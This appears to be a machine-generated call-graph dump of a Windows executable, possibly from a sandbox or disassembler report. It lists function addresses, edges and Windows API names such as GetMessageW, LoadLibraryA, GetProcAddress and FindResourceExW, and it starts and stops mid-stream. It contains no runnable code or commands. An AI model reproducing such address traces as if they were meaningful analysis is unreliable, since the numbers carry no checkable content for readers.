102910->103102 102912 2042ca Mailbox 102913 20caee 48 API calls 102912->102913 102914 2042f2 102913->102914 102915 20d380 55 API calls 102914->102915 102916 204305 Mailbox 102915->102916 102917 20caee 48 API calls 102916->102917 102918 204316 102917->102918 103106 20d2d2 102918->103106 102920 204328 Mailbox 103112 20d3d2 102920->103112 102926 204355 102927 2720f7 102926->102927 102928 20435f 102926->102928 102929 204477 48 API calls 102927->102929 102930 221bc7 _W_store_winword 59 API calls 102928->102930 102931 27210b 102929->102931 102932 20436a 102930->102932 102934 204477 48 API calls 102931->102934 102932->102931 102933 204374 102932->102933 102935 221bc7 _W_store_winword 59 API calls 102933->102935 102936 272127 102934->102936 102937 20437f 102935->102937 102938 27212f GetModuleFileNameW 102936->102938 102937->102938 102939 204389 102937->102939 102940 204477 48 API calls 102938->102940 102941 221bc7 _W_store_winword 59 API calls 102939->102941 102943 272160 102940->102943 102942 204394 102941->102942 102947 204477 48 API calls 102942->102947 102948 272185 _wcscpy 102942->102948 102958 2043d6 102942->102958 103161 20c935 102943->103161 102945 2043e7 103133 203320 102945->103133 102950 2043b8 _wcscpy 102947->102950 102953 204477 48 API calls 102948->102953 102949 204477 48 API calls 102952 27217d 102949->102952 102957 204477 48 API calls 102950->102957 102952->102948 102955 2721ab 102953->102955 102954 2043ff 103144 2114a0 102954->103144 102955->102955 102957->102958 102958->102945 102958->102948 102959 2114a0 48 API calls 102961 20440f 102959->102961 102961->102959 102962 204477 48 API calls 102961->102962 102963 204451 Mailbox 102961->102963 103160 207bef 48 API calls 102961->103160 102962->102961 102963->102854 102965 273ce4 _memset 102964->102965 102966 203c1f 102964->102966 102968 273cf6 GetOpenFileNameW 102965->102968 103684 2031b8 102966->103684 102968->102966 102970 2037c0 102968->102970 102969 203c28 103691 203a67 SHGetMalloc 102969->103691 102970->102865 102970->102888 102972 203c31 103696 203b45 GetFullPathNameW 102972->103696 103779 20a716 102976->103779 102978 203501 102990 203575 102978->102990 103790 2021dd 86 API calls 102978->103790 102980 20350a 102980->102990 103791 205460 88 API calls Mailbox 102980->103791 102982 203513 102983 203517 GetFullPathNameW 102982->102983 102982->102990 102984 207e53 48 API calls 102983->102984 102985 203541 102984->102985 102986 207e53 48 API calls 102985->102986 102987 20354e 102986->102987 102988 2766b4 _wcscat 102987->102988 102989 207e53 48 API calls 102987->102989 102989->102990 102990->102863 102990->102869 102992 2721b0 102991->102992 102993 20310f 102991->102993 103794 20318a 102993->103794 102997 203185 102998 202e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 102997->102998 102998->102876 103000 20e216 102999->103000 103057 20e226 Mailbox 102999->103057 103002 20e670 103000->103002 103000->103057 103001 24d520 86 API calls 103001->103057 103830 21ecee 255 API calls 103002->103830 103004 203842 103004->102888 103059 202b94 Shell_NotifyIconW _memset 103004->103059 103007 20e26c PeekMessageW 103007->103057 103009 275b13 Sleep 103009->103057 103010 20e695 LockWindowUpdate DestroyWindow GetMessageW 103010->103004 103013 20e6c7 103010->103013 103011 20e4e7 103011->103004 103806 20322e 103011->103806 103015 2762a7 TranslateMessage DispatchMessageW GetMessageW 103013->103015 103015->103004 103015->103015 103016 21cf79 49 API calls 103016->103057 103017 20e657 PeekMessageW 103017->103057 103018 22010a 48 API calls 103018->103057 103019 20e517 timeGetTime 103019->103057 103021 20c935 48 API calls 103021->103057 103022 275dfc WaitForSingleObject 103025 275e19 GetExitCodeProcess CloseHandle 103022->103025 103022->103057 103023 20e641 TranslateMessage DispatchMessageW 103023->103017 103024 276147 Sleep 103054 275cce Mailbox 103024->103054 103025->103057 103026 20d3d2 48 API calls 103026->103054 103027 20e6cc timeGetTime 103831 21cf79 49 API calls 103027->103831 103028 275feb Sleep 103028->103054 103029 21e3a5 timeGetTime 103029->103054 103033 2761de GetExitCodeProcess 103036 2761f4 WaitForSingleObject 103033->103036 103037 27620a CloseHandle 103033->103037 103035 201000 231 API calls 103035->103057 103036->103037 103036->103057 103037->103054 103038 275cea Sleep 103038->103057 103039 201dce 107 API calls 103039->103054 103041 275cd7 Sleep 103041->103038 103042 268a48 108 API calls 103042->103054 103043 276266 Sleep 103043->103057 103045 20caee 48 API calls 103045->103054 103048 20d380 55 API calls 103048->103054 103053 20caee 48 API calls 103053->103057 103054->103026 103054->103029 103054->103033 103054->103038 103054->103039 103054->103041 103054->103042 103054->103043 103054->103045 103054->103048 103054->103057 103833 2456dc 49 API calls Mailbox 103054->103833 103834 21cf79 49 API calls 103054->103834 103835 201000 255 API calls 103054->103835 103875 25d12a 50 API calls 103054->103875 103876 248355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103054->103876 103877 246f5b 63 API calls 3 library calls 103054->103877 103056 20d380 55 API calls 103056->103057 103057->103001 103057->103007 103057->103009 103057->103011 103057->103016 103057->103017 103057->103018 103057->103019 103057->103021 103057->103022 103057->103023 103057->103024 103057->103027 103057->103028 103057->103035 103057->103038 103057->103053 103057->103054 103057->103056 103799 20e7e0 103057->103799 103824 20e7b0 255 API calls Mailbox 103057->103824 103825 20ea00 255 API calls 2 library calls 103057->103825 103826 2144e0 255 API calls Mailbox 103057->103826 103827 213680 255 API calls 2 library calls 103057->103827 103828 21f381 TranslateAcceleratorW 103057->103828 103829 21ed1a IsDialogMessageW GetClassLongW 103057->103829 103832 268b20 48 API calls 103057->103832 103836 20fa40 103057->103836 103058->102879 103059->102888 103060->102863 103061->102874 103063 20cafd __NMSG_WRITE _memmove 103062->103063 103064 22010a 48 API calls 103063->103064 103065 20cb3b 103064->103065 103065->102883 103065->102884 103066->102889 103067->102893 103068->102896 103069->102896 103071 20d3d2 48 API calls 103070->103071 103072 203c80 103071->103072 103073 20a359 103072->103073 103074 20a366 __ftell_nolock 103073->103074 103080 20a4cc Mailbox 103074->103080 103165 207e53 103074->103165 103077 20a398 103086 20a3ce Mailbox 103077->103086 103174 20a4f6 103077->103174 103078 20a4f6 48 API calls 103078->103086 103079 20a49f 103079->103080 103081 20caee 48 API calls 103079->103081 103080->102904 103082 20a4c0 103081->103082 103178 205b47 48 API calls _memmove 103082->103178 103083 20caee 48 API calls 103083->103086 103086->103078 103086->103079 103086->103080 103086->103083 103177 205b47 48 API calls _memmove 103086->103177 103219 203f9b 103087->103219 103090 2034ea 103099 208182 103090->103099 103093 2734c3 103095 2228ca _free 47 API calls 103093->103095 103096 2734d0 103095->103096 103097 203e39 84 API calls 103096->103097 103098 2734d9 103097->103098 103098->103098 103100 22010a 48 API calls 103099->103100 103101 2042ad 103100->103101 103101->102909 103103 20d38b 103102->103103 103104 20d3b4 103103->103104 103673 20d772 55 API calls 103103->103673 103104->102912 103108 20d2df 103106->103108 103110 20d30a 103106->103110 103107 20d2e6 103107->103110 103674 20d349 53 API calls 103107->103674 103108->103107 103675 20d349 53 API calls 103108->103675 103110->102920 103113 22010a 48 API calls 103112->103113 103114 20d3f3 103113->103114 103115 22010a 48 API calls 103114->103115 103116 20433b 103115->103116 103117 204477 103116->103117 103118 204481 103117->103118 103119 20449a 103117->103119 103121 20c935 48 API calls 103118->103121 103120 207e53 48 API calls 103119->103120 103122 204347 103120->103122 103121->103122 103123 221bc7 103122->103123 103124 221bd3 103123->103124 103125 221c48 103123->103125 103132 221bf8 103124->103132 103676 22889e 47 API calls __getptd_noexit 103124->103676 103678 221c5a 59 API calls 3 library calls 103125->103678 103128 221c55 103128->102926 103129 221bdf 103677 227aa0 8 API calls ___wstrgtold12_l 103129->103677 103131 221bea 103131->102926 103132->102926 103134 203334 103133->103134 103136 203339 Mailbox 103133->103136 103679 20342c 48 API calls 103134->103679 103137 203347 103136->103137 103680 20346e 48 API calls 103136->103680 103139 22010a 48 API calls 103137->103139 103140 203422 103137->103140 103141 2033d8 103139->103141 103140->102954 103142 22010a 48 API calls 103141->103142 103143 2033e3 103142->103143 103143->102954 103143->103143 103145 211606 103144->103145 103147 2114b2 103144->103147 103145->102961 103146 2114be 103151 2114c9 103146->103151 103682 20346e 48 API calls 103146->103682 103147->103146 103149 22010a 48 API calls 103147->103149 103150 275299 103149->103150 103153 22010a 48 API calls 103150->103153 103152 21156d 103151->103152 103154 22010a 48 API calls 103151->103154 103152->102961 103159 2752a4 103153->103159 103155 2115af 103154->103155 103156 2115c2 103155->103156 103681 21d6b4 48 API calls 103155->103681 103156->102961 103158 22010a 48 API calls 103158->103159 103159->103146 103159->103158 103160->102961 103162 20c940 103161->103162 103163 20c948 103161->103163 103683 20d805 48 API calls _memmove 103162->103683 103163->102949 103166 207ecf 103165->103166 103169 207e5f __NMSG_WRITE 103165->103169 103181 20a2fb 103166->103181 103168 207e85 _memmove 103168->103077 103170 207ec7 103169->103170 103171 207e7b 103169->103171 103180 207eda 48 API calls 103170->103180 103179 20a6f8 48 API calls 103171->103179 103175 20b8a7 48 API calls 103174->103175 103176 20a501 103175->103176 103176->103077 103177->103086 103178->103080 103179->103168 103180->103168 103182 20a321 _memmove 103181->103182 103183 20a309 103181->103183 103182->103168 103183->103182 103185 20b8a7 103183->103185 103186 20b8ba 103185->103186 103188 20b8b7 _memmove 103185->103188 103189 22010a 103186->103189 103188->103182 103190 220112 __calloc_impl 103189->103190 103192 22012c 103190->103192 103193 22012e std::exception::exception 103190->103193 103198 2245ec 103190->103198 103192->103188 103212 227495 RaiseException 103193->103212 103195 220158 103213 2273cb 47 API calls _free 103195->103213 103197 22016a 103197->103188 103199 224667 __calloc_impl 103198->103199 103209 2245f8 __calloc_impl 103198->103209 103218 22889e 47 API calls __getptd_noexit 103199->103218 103200 224603 103208 221d65 _fast_error_exit 3 API calls 103200->103208 103200->103209 103214 228e52 47 API calls __NMSG_WRITE 103200->103214 103215 228eb2 47 API calls 5 library calls 103200->103215 103203 22462b RtlAllocateHeap 103204 22465f 103203->103204 103203->103209 103204->103190 103206 224653 103216 22889e 47 API calls __getptd_noexit 103206->103216 103208->103200 103209->103200 103209->103203 103209->103206 103210 224651 103209->103210 103217 22889e 47 API calls __getptd_noexit 103210->103217 103212->103195 103213->103197 103214->103200 103215->103200 103216->103210 103217->103204 103218->103204 103284 203f5d 103219->103284 103224 203fc6 LoadLibraryExW 103294 203e78 103224->103294 103225 275830 103226 203e39 84 API calls 103225->103226 103228 275837 103226->103228 103231 203e78 3 API calls 103228->103231 103233 27583f 103231->103233 103232 203fed 103232->103233 103234 203ff9 103232->103234 103320 20417d 103233->103320 103235 203e39 84 API calls 103234->103235 103237 2034e2 103235->103237 103237->103090 103243 24cc82 103237->103243 103240 275866 103328 2041cb 103240->103328 103242 275873 103244 2041a7 83 API calls 103243->103244 103245 24ccf1 103244->103245 103509 24ce59 103245->103509 103248 20417d 64 API calls 103249 24cd1e 103248->103249 103250 20417d 64 API calls 103249->103250 103251 24cd2e 103250->103251 103252 20417d 64 API calls 103251->103252 103253 24cd49 103252->103253 103254 20417d 64 API calls 103253->103254 103255 24cd64 103254->103255 103256 2041a7 83 API calls 103255->103256 103257 24cd7b 103256->103257 103258 2245ec std::exception::_Copy_str 47 API calls 103257->103258 103259 24cd82 103258->103259 103260 2245ec std::exception::_Copy_str 47 API calls 103259->103260 103261 24cd8c 103260->103261 103262 20417d 64 API calls 103261->103262 103263 24cda0 103262->103263 103264 24c846 GetSystemTimeAsFileTime 103263->103264 103265 24cdb3 103264->103265 103266 24cddd 103265->103266 103267 24cdc8 103265->103267 103269 24ce42 103266->103269 103270 24cde3 103266->103270 103268 2228ca _free 47 API calls 103267->103268 103273 24cdce 103268->103273 103272 2228ca _free 47 API calls 103269->103272 103515 24c251 103270->103515 103277 24cd07 103272->103277 103275 2228ca _free 47 API calls 103273->103275 103275->103277 103276 2228ca _free 47 API calls 103276->103277 103277->103093 103278 203e39 103277->103278 103279 203e43 103278->103279 103280 203e4a 103278->103280 103281 224274 __fcloseall 83 API calls 103279->103281 103282 203e59 103280->103282 103283 203e6a FreeLibrary 103280->103283 103281->103280 103282->103093 103283->103282 103333 203f20 103284->103333 103287 203f85 103289 203f96 103287->103289 103290 203f8d FreeLibrary 103287->103290 103291 224129 103289->103291 103290->103289 103341 22413e 103291->103341 103293 203fba 103293->103224 103293->103225 103420 203eb3 103294->103420 103297 203e9f 103299 203eb1 103297->103299 103300 203ea8 FreeLibrary 103297->103300 103301 204010 103299->103301 103300->103299 103302 22010a 48 API calls 103301->103302 103303 204025 103302->103303 103428 204bce 103303->103428 103305 204031 _memmove 103306 20406c 103305->103306 103308 204161 103305->103308 103309 204129 103305->103309 103307 2041cb 57 API calls 103306->103307 103316 204075 103307->103316 103442 24d03f 93 API calls 103308->103442 103431 2031f2 CreateStreamOnHGlobal 103309->103431 103312 20417d 64 API calls 103312->103316 103314 204109 103314->103232 103315 275794 103317 2041a7 83 API calls 103315->103317 103316->103312 103316->103314 103316->103315 103437 2041a7 103316->103437 103318 2757a8 103317->103318 103319 20417d 64 API calls 103318->103319 103319->103314 103321 20418f 103320->103321 103324 27587d 103320->103324 103466 2244ae 103321->103466 103325 24c846 103486 24c6a0 103325->103486 103327 24c85c 103327->103240 103329 2041da 103328->103329 103331 2758bf 103328->103331 103491 224af5 103329->103491 103332 2041e2 103332->103242 103337 203f32 103333->103337 103336 203f08 LoadLibraryA GetProcAddress 103336->103287 103338 203f28 103337->103338 103339 203f3b LoadLibraryA 103337->103339 103338->103287 103338->103336 103339->103338 103340 203f4c GetProcAddress 103339->103340 103340->103338 103343 22414a __lseeki64 103341->103343 103342 22415d 103389 22889e 47 API calls __getptd_noexit 103342->103389 103343->103342 103346 22418e 103343->103346 103345 224162 103390 227aa0 8 API calls ___wstrgtold12_l 103345->103390 103360 22f278 103346->103360 103349 224193 103350 2241a9 103349->103350 103351 22419c 103349->103351 103353 2241d3 103350->103353 103354 2241b3 103350->103354 103391 22889e 47 API calls __getptd_noexit 103351->103391 103374 22f390 103353->103374 103392 22889e 47 API calls __getptd_noexit 103354->103392 103356 22416d __lseeki64 @_EH4_CallFilterFunc@8 103356->103293 103361 22f284 __lseeki64 103360->103361 103362 228984 __lock 47 API calls 103361->103362 103363 22f292 103362->103363 103364 22f309 103363->103364 103369 228a0c __mtinitlocknum 47 API calls 103363->103369 103372 22f302 103363->103372 103397 225ade 48 API calls __lock 103363->103397 103398 225b48 LeaveCriticalSection LeaveCriticalSection _doexit 103363->103398 103399 227660 47 API calls std::exception::_Copy_str 103364->103399 103367 22f310 103368 22f31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 103367->103368 103367->103372 103368->103372 103369->103363 103371 22f37c __lseeki64 103371->103349 103394 22f387 103372->103394 103382 22f3b0 __wopenfile 103374->103382 103375 22f3ca 103404 22889e 47 API calls __getptd_noexit 103375->103404 103377 22f3cf 103405 227aa0 8 API calls ___wstrgtold12_l 103377->103405 103379 2241de 103393 224200 LeaveCriticalSection LeaveCriticalSection _fseek 103379->103393 103380 22f5e8 103401 237179 103380->103401 103382->103375 103388 22f585 103382->103388 103406 22247b 59 API calls 2 library calls 103382->103406 103384 22f57e 103384->103388 103407 22247b 59 API calls 2 library calls 103384->103407 103386 22f59d 103386->103388 103408 22247b 59 API calls 2 library calls 103386->103408 103388->103375 103388->103380 103389->103345 103390->103356 103391->103356 103392->103356 103393->103356 103400 228ae8 LeaveCriticalSection 103394->103400 103396 22f38e 103396->103371 103397->103363 103398->103363 103399->103367 103400->103396 103409 236961 103401->103409 103403 237192 103403->103379 103404->103377 103405->103379 103406->103384 103407->103386 103408->103388 103412 23696d __lseeki64 103409->103412 103410 23697f 103411 22889e ___wstrgtold12_l 47 API calls 103410->103411 103413 236984 103411->103413 103412->103410 103414 2369b6 103412->103414 103415 227aa0 ___wstrgtold12_l 8 API calls 103413->103415 103416 236a28 __wsopen_helper 110 API calls 103414->103416 103419 23698e __lseeki64 103415->103419 103417 2369d3 103416->103417 103418 2369fc __wsopen_helper LeaveCriticalSection 103417->103418 103418->103419 103419->103403 103424 203ec5 103420->103424 103423 203ef0 LoadLibraryA GetProcAddress 103423->103297 103425 203e91 103424->103425 103426 203ece LoadLibraryA 103424->103426 103425->103297 103425->103423 103426->103425 103427 203edf GetProcAddress 103426->103427 103427->103425 103429 22010a 48 API calls 103428->103429 103430 204be0 103429->103430 103430->103305 103432 20320c FindResourceExW 103431->103432 103434 203229 103431->103434 103433 2757d3 LoadResource 103432->103433 103432->103434 103433->103434 103435 2757e8 SizeofResource 103433->103435 103434->103306 103435->103434 103436 2757fc LockResource 103435->103436 103436->103434 103438 2041b6 103437->103438 103439 27589d 103437->103439 103443 22471d 103438->103443 103441 2041c4 103441->103316 103442->103306 103445 224729 __lseeki64 103443->103445 103444 224737 103456 22889e 47 API calls __getptd_noexit 103444->103456 103445->103444 103446 22475d 103445->103446 103458 225a9f 103446->103458 103449 22473c 103457 227aa0 8 API calls ___wstrgtold12_l 103449->103457 103450 224763 103464 22468e 81 API calls 4 library calls 103450->103464 103453 224772 103465 224794 LeaveCriticalSection LeaveCriticalSection _fseek 103453->103465 103455 224747 __lseeki64 103455->103441 103456->103449 103457->103455 103459 225ad1 EnterCriticalSection 103458->103459 103460 225aaf 103458->103460 103462 225ac7 103459->103462 103460->103459 103461 225ab7 103460->103461 103463 228984 __lock 47 API calls 103461->103463 103462->103450 103463->103462 103464->103453 103465->103455 103469 2244c9 103466->103469 103468 2041a0 103468->103325 103470 2244d5 __lseeki64 103469->103470 103471 2244eb _memset 103470->103471 103472 224518 103470->103472 103473 224510 __lseeki64 103470->103473 103482 22889e 47 API calls __getptd_noexit 103471->103482 103474 225a9f __lock_file 48 API calls 103472->103474 103473->103468 103476 22451e 103474->103476 103484 2242eb 62 API calls 6 library calls 103476->103484 103477 224505 103483 227aa0 8 API calls ___wstrgtold12_l 103477->103483 103480 224534 103485 224552 LeaveCriticalSection LeaveCriticalSection _fseek 103480->103485 103482->103477 103483->103473 103484->103480 103485->103473 103489 2240da GetSystemTimeAsFileTime 103486->103489 103488 24c6af 103488->103327 103490 224108 __aulldiv 103489->103490 103490->103488 103492 224b01 __lseeki64 103491->103492 103493 224b24 103492->103493 103494 224b0f 103492->103494 103496 225a9f __lock_file 48 API calls 103493->103496 103505 22889e 47 API calls __getptd_noexit 103494->103505 103498 224b2a 103496->103498 103497 224b14 103506 227aa0 8 API calls ___wstrgtold12_l 103497->103506 103507 22479c 55 API calls 4 library calls 103498->103507 103501 224b35 103508 224b55 LeaveCriticalSection LeaveCriticalSection _fseek 103501->103508 103503 224b47 103504 224b1f __lseeki64 103503->103504 103504->103332 103505->103497 103506->103504 103507->103501 103508->103503 103513 24ce6d __tzset_nolock _wcscmp 103509->103513 103510 20417d 64 API calls 103510->103513 103511 24c846 GetSystemTimeAsFileTime 103511->103513 103512 24cd03 103512->103248 103512->103277 103513->103510 103513->103511 103513->103512 103514 2041a7 83 API calls 103513->103514 103514->103513 103516 24c25c 103515->103516 103517 24c26a 103515->103517 103518 224129 117 API calls 103516->103518 103519 24c2af 103517->103519 103520 224129 117 API calls 103517->103520 103531 24c273 103517->103531 103518->103517 103546 24c4d4 64 API calls 3 library calls 103519->103546 103521 24c294 103520->103521 103521->103519 103524 24c29d 103521->103524 103523 24c2f3 103525 24c2f7 103523->103525 103526 24c318 103523->103526 103524->103531 103556 224274 103524->103556 103527 24c304 103525->103527 103530 224274 __fcloseall 83 API calls 103525->103530 103547 24c0d1 103526->103547 103527->103531 103533 224274 __fcloseall 83 API calls 103527->103533 103530->103527 103531->103276 103533->103531 103534 24c346 103569 24c376 90 API calls 103534->103569 103535 24c326 103537 24c333 103535->103537 103539 224274 __fcloseall 83 API calls 103535->103539 103537->103531 103540 224274 __fcloseall 83 API calls 103537->103540 103538 24c34d 103570 24c450 103538->103570 103539->103537 103540->103531 103543 224274 __fcloseall 83 API calls 103544 24c361 103543->103544 103544->103531 103545 224274 __fcloseall 83 API calls 103544->103545 103545->103531 103546->103523 103548 2245ec std::exception::_Copy_str 47 API calls 103547->103548 103549 24c0e0 103548->103549 103550 2245ec std::exception::_Copy_str 47 API calls 103549->103550 103551 24c0f4 103550->103551 103552 2245ec std::exception::_Copy_str 47 API calls 103551->103552 103553 24c108 103552->103553 103554 24c450 47 API calls 103553->103554 103555 24c11b 103553->103555 103554->103555 103555->103534 103555->103535 103557 224280 __lseeki64 103556->103557 103558 224294 103557->103558 103559 2242ac 103557->103559 103594 22889e 47 API calls __getptd_noexit 103558->103594 103562 225a9f __lock_file 48 API calls 103559->103562 103565 2242a4 __lseeki64 103559->103565 103561 224299 103595 227aa0 8 API calls ___wstrgtold12_l 103561->103595 103564 2242be 103562->103564 103578 224208 103564->103578 103565->103531 103569->103538 103571 24c45d 103570->103571 103573 24c463 103570->103573 103572 2228ca _free 47 API calls 103571->103572 103572->103573 103574 2228ca _free 47 API calls 103573->103574 103576 24c474 103573->103576 103574->103576 103575 24c354 103575->103543 103575->103544 103576->103575 103577 2228ca _free 47 API calls 103576->103577 103577->103575 103579 224217 103578->103579 103580 22422b 103578->103580 103637 22889e 47 API calls __getptd_noexit 103579->103637 103581 224227 103580->103581 103597 223914 103580->103597 103596 2242e3 LeaveCriticalSection LeaveCriticalSection _fseek 103581->103596 103584 22421c 103638 227aa0 8 API calls ___wstrgtold12_l 103584->103638 103590 224245 103614 22f782 103590->103614 103592 22424b 103592->103581 103593 2228ca _free 47 API calls 103592->103593 103593->103581 103594->103561 103595->103565 103596->103565 103598 223927 103597->103598 103602 22394b 103597->103602 103599 2235c3 _fprintf 47 API calls 103598->103599 103598->103602 103600 223944 103599->103600 103639 22bd14 78 API calls 5 library calls 103600->103639 103603 22f8e6 103602->103603 103604 22f8f3 103603->103604 103606 22423f 103603->103606 103605 2228ca _free 47 API calls 103604->103605 103604->103606 103605->103606 103607 2235c3 103606->103607 103608 2235e2 103607->103608 103609 2235cd 103607->103609 103608->103590 103640 22889e 47 API calls __getptd_noexit 103609->103640 103611 2235d2 103641 227aa0 8 API calls ___wstrgtold12_l 103611->103641 103613 2235dd 103613->103590 103615 22f78e __lseeki64 103614->103615 103616 22f796 103615->103616 103621 22f7ae 103615->103621 103666 22886a 47 API calls __getptd_noexit 103616->103666 103618 22f82b 103670 22886a 47 API calls __getptd_noexit 103618->103670 103619 22f79b 103667 22889e 47 API calls __getptd_noexit 103619->103667 103621->103618 103624 22f7d8 103621->103624 103623 22f830 103671 22889e 47 API calls __getptd_noexit 103623->103671 103642 22b6a0 103624->103642 103627 22f838 103672 227aa0 8 API calls ___wstrgtold12_l 103627->103672 103628 22f7de 103630 22f7f1 103628->103630 103631 22f7fc 103628->103631 103651 22f84c 103630->103651 103668 22889e 47 API calls __getptd_noexit 103631->103668 103633 22f7a3 __lseeki64 103633->103592 103635 22f7f7 103669 22f823 LeaveCriticalSection __unlock_fhandle 103635->103669 103637->103584 103638->103581 103639->103602 103640->103611 103641->103613 103644 22b6ac __lseeki64 103642->103644 103643 22b6f9 EnterCriticalSection 103646 22b71f __lseeki64 103643->103646 103644->103643 103645 228984 __lock 47 API calls 103644->103645 103647 22b6d0 103645->103647 103646->103628 103648 22b6db InitializeCriticalSectionAndSpinCount 103647->103648 103649 22b6ed 103647->103649 103648->103649 103650 22b723 ___lock_fhandle LeaveCriticalSection 103649->103650 103650->103643 103652 22b957 __lseeki64_nolock 47 API calls 103651->103652 103653 22f85a 103652->103653 103654 22f8b0 103653->103654 103655 22f88e 103653->103655 103658 22b957 __lseeki64_nolock 47 API calls 103653->103658 103656 22b8d1 __free_osfhnd 48 API calls 103654->103656 103655->103654 103659 22b957 __lseeki64_nolock 47 API calls 103655->103659 103657 22f8b8 103656->103657 103660 22f8da 103657->103660 103663 22887d __dosmaperr 47 API calls 103657->103663 103661 22f885 103658->103661 103662 22f89a CloseHandle 103659->103662 103660->103635 103664 22b957 __lseeki64_nolock 47 API calls 103661->103664 103662->103654 103665 22f8a6 GetLastError 103662->103665 103663->103660 103664->103655 103665->103654 103666->103619 103667->103633 103668->103635 103669->103633 103670->103623 103671->103627 103672->103633 103673->103104 103674->103110 103675->103107 103676->103129 103677->103131 103678->103128 103679->103136 103680->103137 103681->103156 103682->103151 103683->103163 103685 274aa5 GetFullPathNameW 103684->103685 103686 2031c7 103684->103686 103688 274abd 103685->103688 103741 203bcf 103686->103741 103689 2031cd GetFullPathNameW 103690 2031e7 103689->103690 103690->102969 103692 203ade 103691->103692 103693 203a8b SHGetDesktopFolder 103691->103693 103692->102972 103693->103692 103694 203a99 103693->103694 103694->103692 103695 203ac8 SHGetPathFromIDListW 103694->103695 103695->103692 103699 203ba9 103696->103699 103703 203b72 103696->103703 103697 221bc7 _W_store_winword 59 API calls 103697->103699 103698 203bcf 48 API calls 103700 203b7d 103698->103700 103699->103697 103701 2733e5 103699->103701 103699->103703 103745 20197e 103700->103745 103703->103698 103705 20197e 48 API calls 103706 203b9f 103705->103706 103707 203dcb 103706->103707 103708 203f9b 136 API calls 103707->103708 103709 203def 103708->103709 103710 2739f9 103709->103710 103712 203f9b 136 API calls 103709->103712 103711 24cc82 122 API calls 103710->103711 103714 273a0e 103711->103714 103713 203e02 103712->103713 103713->103710 103715 203e0a 103713->103715 103716 273a12 103714->103716 103717 273a2f 103714->103717 103718 203e16 103715->103718 103719 273a1a 103715->103719 103720 203e39 84 API calls 103716->103720 103721 22010a 48 API calls 103717->103721 103775 20bdf0 163 API calls 8 library calls 103718->103775 103776 24757b 87 API calls _wprintf 103719->103776 103720->103719 103740 273a74 Mailbox 103721->103740 103724 203e2e 103724->102970 103725 273a28 103725->103717 103726 273c24 103727 2228ca _free 47 API calls 103726->103727 103728 273c2c 103727->103728 103729 203e39 84 API calls 103728->103729 103734 273c35 103729->103734 103733 2228ca _free 47 API calls 103733->103734 103734->103733 103735 203e39 84 API calls 103734->103735 103778 2432b0 86 API calls 4 library calls 103734->103778 103735->103734 103737 20caee 48 API calls 103737->103740 103740->103726 103740->103734 103740->103737 103751 2430ac 103740->103751 103754 24a525 103740->103754 103760 20b6d0 103740->103760 103769 20a870 103740->103769 103777 242fcd 60 API calls 2 library calls 103740->103777 103742 203bd9 __NMSG_WRITE 103741->103742 103743 22010a 48 API calls 103742->103743 103744 203bee _wcscpy 103743->103744 103744->103689 103746 201990 103745->103746 103750 2019af _memmove 103745->103750 103748 22010a 48 API calls 103746->103748 103747 22010a 48 API calls 103749 2019c6 103747->103749 103748->103750 103749->103705 103750->103747 103752 22010a 48 API calls 103751->103752 103753 2430dc _memmove 103752->103753 103753->103740 103755 24a530 103754->103755 103756 22010a 48 API calls 103755->103756 103757 24a547 103756->103757 103758 24a556 103757->103758 103759 20caee 48 API calls 103757->103759 103758->103740 103759->103758 103761 20b6e3 _memmove 103760->103761 103762 20b789 103760->103762 103763 22010a 48 API calls 103761->103763 103764 22010a 48 API calls 103762->103764 103766 20b6ea 103763->103766 103764->103761 103765 20b71b 103765->103740 103766->103765 103767 22010a 48 API calls 103766->103767 103768 20b74d 103767->103768 103768->103740 103770 20a883 103769->103770 103772 20a93d 103769->103772 103771 22010a 48 API calls 103770->103771 103770->103772 103773 20a8c1 103770->103773 103771->103773 103772->103740 103773->103772 103774 22010a 48 API calls 103773->103774 103774->103773 103775->103724 103776->103725 103777->103740 103778->103734 103780 20a848 103779->103780 103781 20a72c 103779->103781 103780->102978 103781->103780 103782 22010a 48 API calls 103781->103782 103783 20a753 103782->103783 103784 22010a 48 API calls 103783->103784 103785 20a7c5 103784->103785 103785->103780 103788 20a870 48 API calls 103785->103788 103789 20b6d0 48 API calls 103785->103789 103792 20ace0 91 API calls 2 library calls 103785->103792 103793 24a3ee 48 API calls 103785->103793 103788->103785 103789->103785 103790->102980 103791->102982 103792->103785 103793->103785 103795 2031a2 LoadImageW 103794->103795 103796 274ad8 EnumResourceNamesW 103794->103796 103797 203118 RegisterClassExW 103795->103797 103796->103797 103798 202f58 7 API calls 103797->103798 103798->102997 103800 20e7fd 103799->103800 103801 20e80f 103799->103801 103878 20dcd0 103800->103878 103909 24d520 86 API calls 4 library calls 103801->103909 103803 20e806 103803->103057 103805 2798e8 103805->103805 103917 20325d 103806->103917 103808 20323b 103809 20325a 103808->103809 103811 2766cc 103808->103811 103809->103004 103812 21ec33 103809->103812 103811->103808 103921 24a31d 13 API calls Mailbox 103811->103921 103813 20caee 48 API calls 103812->103813 103814 21ec5d 103813->103814 103815 20d380 55 API calls 103814->103815 103816 21ec6d Mailbox 103815->103816 103817 20caee 48 API calls 103816->103817 103818 21ec96 103817->103818 103819 20d380 55 API calls 103818->103819 103822 21eca6 Mailbox 103819->103822 103820 21ecdb 103820->103010 103822->103820 103923 21cf79 49 API calls 103822->103923 103924 24d80a 255 API calls 103822->103924 103824->103057 103825->103057 103826->103057 103827->103057 103828->103057 103829->103057 103830->103011 103831->103057 103832->103057 103833->103054 103834->103054 103835->103054 103837 20fa60 103836->103837 103873 20fa8e Mailbox _memmove 103836->103873 103838 22010a 48 API calls 103837->103838 103838->103873 103839 21105e 103840 20c935 48 API calls 103839->103840 103866 20fbf1 Mailbox 103840->103866 103841 23a599 InterlockedDecrement 103841->103873 103842 20d3d2 48 API calls 103842->103873 103844 210119 103950 24d520 86 API calls 4 library calls 103844->103950 103845 22010a 48 API calls 103845->103873 103847 20c935 48 API calls 103847->103873 103849 211063 103949 24d520 86 API calls 4 library calls 103849->103949 103850 210dee 103932 20d89e 103850->103932 103851 210dfa 103856 20d89e 50 API calls 103851->103856 103853 27b772 103951 24d520 86 API calls 4 library calls 103853->103951 103857 210e83 103856->103857 103861 20caee 48 API calls 103857->103861 103859 221b2a 52 API calls __cinit 103859->103873 103860 27b7d2 103872 2110f1 Mailbox 103861->103872 103863 211230 103863->103866 103948 24d520 86 API calls 4 library calls 103863->103948 103866->103057 103867 20fa40 255 API calls 103867->103873 103870 27b583 103946 24d520 86 API calls 4 library calls 103870->103946 103947 24d520 86 API calls 